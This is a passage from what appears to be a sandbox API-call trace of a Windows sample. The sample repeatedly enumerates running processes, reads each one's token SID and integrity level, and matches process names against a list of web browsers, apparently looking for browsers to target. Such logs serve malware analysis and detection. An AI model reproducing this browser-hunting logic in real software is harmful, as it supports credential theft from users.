bInheritHandle=0, dwProcessId=0x4c8) returned 0x2cc [0585.476] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0585.476] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0585.476] GetLastError () returned 0x7a [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0585.477] CloseHandle (hObject=0x5d8) returned 1 [0585.477] CloseHandle (hObject=0x2cc) returned 1 [0585.477] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0585.477] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0585.477] GetLastError () returned 0x7a [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0585.477] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0585.477] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0585.477] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0585.477] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0585.477] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0585.477] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0585.477] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0585.477] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0585.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0585.477] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x2cc [0585.477] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0585.477] GetLastError () returned 0x7a [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0585.477] CloseHandle (hObject=0x5d8) returned 1 [0585.477] CloseHandle (hObject=0x2cc) returned 1 [0585.477] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0585.477] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0585.477] GetLastError () returned 0x7a [0585.477] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0585.477] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0585.477] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0585.477] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0585.477] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0585.478] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0585.478] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0585.478] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0585.478] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0585.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x2cc [0585.478] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0585.478] GetLastError () returned 0x7a [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0585.478] CloseHandle (hObject=0x5d8) returned 1 [0585.478] CloseHandle (hObject=0x2cc) returned 1 [0585.478] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0585.478] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0585.478] GetLastError () returned 0x7a [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0585.478] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0585.478] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0585.478] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0585.478] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0585.478] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0585.478] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0585.478] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0585.478] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0585.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0585.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x2cc [0585.478] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0585.478] GetLastError () returned 0x7a [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0585.478] CloseHandle (hObject=0x5d8) returned 1 [0585.478] CloseHandle (hObject=0x2cc) returned 1 [0585.478] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0585.478] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0585.478] GetLastError () returned 0x7a [0585.478] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0585.479] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0585.479] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0585.479] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0585.479] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0585.479] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0585.479] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0585.479] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0585.479] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0585.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0585.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0585.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0585.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x2cc [0585.479] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5d8) returned 1 [0585.479] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0585.479] GetLastError () returned 0x7a [0585.479] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0585.479] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0585.479] CloseHandle (hObject=0x5d8) returned 1 [0585.479] CloseHandle (hObject=0x2cc) returned 1 [0585.479] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0585.479] OpenProcessToken (in: ProcessHandle=0x2cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5d8) returned 1 [0585.479] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0585.479] GetLastError () returned 0x7a [0585.479] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0585.479] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0585.479] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0585.479] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0585.479] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0585.479] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0585.479] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0585.479] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0585.479] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0585.479] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0585.479] VirtualFree (lpAddress=0x490000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0585.480] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0588.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9a28) returned 0xc0000004 [0588.080] VirtualAlloc (lpAddress=0x0, dwSize=0xaa28, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0588.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xaa28, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0588.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0588.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0588.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0588.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0588.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0588.081] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0588.082] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4cc [0588.082] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5b0) returned 1 [0588.082] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0588.082] GetLastError () returned 0x7a [0588.082] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0588.082] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0588.082] CloseHandle (hObject=0x5b0) returned 1 [0588.082] CloseHandle (hObject=0x4cc) returned 1 [0588.082] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0588.082] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5b0) returned 1 [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0588.083] GetLastError () returned 0x7a [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0588.083] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0588.083] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0588.083] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0588.083] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0588.083] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0588.083] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0588.083] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0588.083] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0588.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0588.083] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x4cc [0588.083] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5b0) returned 1 [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0588.083] GetLastError () returned 0x7a [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0588.083] CloseHandle (hObject=0x5b0) returned 1 [0588.083] CloseHandle (hObject=0x4cc) returned 1 [0588.083] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0588.083] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5b0) returned 1 [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0588.083] GetLastError () returned 0x7a [0588.083] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0588.084] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0588.084] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0588.084] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0588.084] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0588.084] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0588.084] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0588.084] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0588.084] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0588.084] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x4cc [0588.084] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x5b0) returned 1 [0588.084] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0588.084] GetLastError () returned 0x7a [0588.084] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x1, TokenInformation=0x40fd78, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd78, ReturnLength=0x20f7ac) returned 1 [0588.084] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0588.084] CloseHandle (hObject=0x5b0) returned 1 [0588.084] CloseHandle (hObject=0x4cc) returned 1 [0588.084] GetLengthSid (pSid=0x40fd80*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0588.084] OpenProcessToken (in: ProcessHandle=0x4cc, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x5b0) returned 1 [0588.084] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0588.084] GetLastError () returned 0x7a [0588.084] GetTokenInformation (in: TokenHandle=0x5b0, TokenInformationClass=0x19, TokenInformation=0x41af88, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af88, ReturnLength=0x20f7d8) returned 1 [0588.084] GetSidSubAuthorityCount (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af91 [0588.084] GetSidSubAuthority (pSid=0x41af90*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af98 [0588.084] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0588.085] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0588.085] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0588.085] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0588.085] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") 